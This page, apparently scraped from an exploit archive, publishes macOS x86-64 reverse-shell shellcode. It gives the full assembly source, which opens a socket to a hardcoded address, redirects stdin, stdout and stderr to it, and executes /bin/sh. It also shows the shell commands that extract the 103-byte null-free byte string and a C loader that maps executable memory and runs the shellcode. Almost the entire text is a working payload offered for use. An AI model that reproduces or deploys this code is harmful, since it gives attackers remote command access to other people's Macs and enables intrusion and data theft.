apple macos reverse ( shell (binsh) + nullfree shellcode (103 bytes)

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apple macos reverse ( shell (binsh) + nullfree shellcode (103 bytes) Code Code...
/* # Title: macOS - Reverse ( Shell (/bin/sh) + Null-Free Shellcode (103 bytes) # Date: 2019-02-17 # Tested: macOS 10.14.1 # Author: Ken Kitahara # Compilation: gcc -o loader loader.c dev:works devuser$ sw_vers ProductName: Mac OS X ProductVersion: 10.14.1 BuildVersion: 18B75 dev:works devuser$ cat ipv4rev.s section .text global start start: ; socket(AF_INET4, SOCK_STREAM, IPPROTO_IP) xor rdi, rdi mul rdi mov dil, 0x2 xor rsi, rsi mov sil, 0x1 mov al, 0x2 ror rax, 0x28 mov r8, rax mov al, 0x61 syscall ; struct sockaddr_in { ; __uint8_t sin_len; ; sa_family_t sin_family; ; in_port_t sin_port; ; struct in_addr sin_addr; ; char sin_zero[8]; ; }; mov rsi, 0xfeffff80a3eefdf0 neg rsi push rsi push rsp pop rsi ; connect(sockid, &sockaddr, 16) mov rdi, rax xor dl, 0x10 mov rax, r8 mov al, 0x62 syscall xor rsi, rsi mov sil, 0x3 dup2: ; dup2(sockid, 2) ; -> dup2(sockid, 1) ; -> dup2(sockid, 0) mov rax, r8 mov al, 0x5a sub sil, 1 syscall test rsi, rsi jne dup2 ; execve("//bin/sh", 0, 0) push rsi mov rdi, 0x68732f6e69622f2f push rdi push rsp pop rdi xor rdx, rdx mov rax, r8 mov al, 0x3b syscall dev:works devuser$ nasm -f macho64 -o ipv4rev.o ipv4rev.s && ld -macosx_version_min 10.7.0 -o ipv4rev ipv4rev.o dev:works devuser$ for i in $(objdump -d ./ipv4rev.o | grep "^ " | cut -f2); do echo -n '\x'$i; done; echo \x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xbe\xf0\xfd\xee\xa3\x80\xff\xff\xfe\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05 dev:works devuser$ */ #include <stdio.h> #include <sys/mman.h> #include <string.h> #include <stdlib.h> int (*sc)(); char shellcode[] = "\x48\x31\xff\x48\xf7\xe7\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\xb0\x02\x48\xc1\xc8\x28\x49\x89\xc0\xb0\x61\x0f\x05\x48\xbe\xf0\xfd\xee\xa3\x80\xff\xff\xfe\x48\xf7\xde\x56\x54\x5e\x48\x89\xc7\x80\xf2\x10\x4c\x89\xc0\xb0\x62\x0f\x05\x48\x31\xf6\x40\xb6\x03\x4c\x89\xc0\xb0\x5a\x40\x80\xee\x01\x0f\x05\x48\x85\xf6\x75\xf0\x56\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x57\x54\x5f\x48\x31\xd2\x4c\x89\xc0\xb0\x3b\x0f\x05"; int main(int argc, char **argv) { printf("Shellcode Length: %zd Bytes\n", strlen(shellcode)); void *ptr = mmap(0, 0x22, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE, -1, 0); if (ptr == MAP_FAILED) { perror("mmap"); exit(-1); } memcpy(ptr, shellcode, sizeof(shellcode)); sc = ptr; sc(); return 0; }

Apple macos reverse ( shell (binsh) + nullfree shellcode (103 bytes) Vulnerability / Exploit Source : Apple macos reverse ( shell (binsh) + nullfree shellcode (103 bytes)

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